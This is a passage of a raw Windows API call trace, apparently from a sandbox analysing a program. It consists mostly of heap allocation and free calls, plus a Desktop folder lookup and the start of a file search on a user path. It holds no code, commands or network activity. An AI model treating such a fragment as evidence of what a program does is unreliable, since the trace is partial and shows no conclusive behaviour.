(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0163.519] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0163.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0163.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0163.519] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0163.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0163.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0163.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0163.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0163.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0163.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0163.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0163.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0163.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0163.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0163.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0163.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0163.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0163.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.523] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0163.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0163.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0163.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0163.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0163.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0163.524] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.524] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0163.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0163.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0163.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.525] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0163.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0163.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0163.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.527] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0163.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0163.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.528] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0163.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0163.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0163.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0163.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0163.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0163.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 